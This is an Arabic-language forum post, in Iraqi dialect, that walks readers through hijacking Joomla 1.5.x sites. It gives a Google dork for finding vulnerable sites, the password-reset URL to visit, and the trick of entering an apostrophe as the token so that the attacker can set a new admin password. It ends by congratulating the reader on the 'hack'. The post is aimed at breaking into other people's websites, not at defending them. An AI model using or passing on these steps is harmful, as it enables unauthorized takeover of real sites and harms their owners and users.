اقدم لكم وبين ايديكم شرح استغلال ثغره سكربت جومله ****** Joomla=========== Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability الأصدارات المصابة 1.5.x نوع الثغرة Remote Admin Change Password تغيير باسوورد الأدمن هسه ندخل على التطبيق ولبحث الدورك البحث تدخل تفتح الكوكل صديقنا Google وتكدب هاذا الكود الي هوه الدورك كود PHP: inurl:index.php?option=com_use طلعتنه هوايه مواقع مصابه تختار احد من هن هسه تشوف طريقه الاستغلال الثغره بعد مالكينه الموقع المصاب ندخل للموقع المصاب ونضيف هاذا المسار كود PHP: index.php?option=com_user&view=reset&layout=confir m يصير هيجي يعني كود PHP: http://www.XXXXXX.com/index.php?opti...layout=confirm راح يطلع مربع اسمة "token نخلي بل مربع هاذي العلامه النقطه ' هسه راج يطلب منك باسورد جديد تكتب الباسورد الي تريده وتعيد كتابته مره لخ ومبرووك الاختراقق خوما صعبه ااذا صعبه كلولي نلقاكم بدرس اخررر
معهد شموخ العرب لتطوير وبرمجة المنتديات
قوانين المنتدى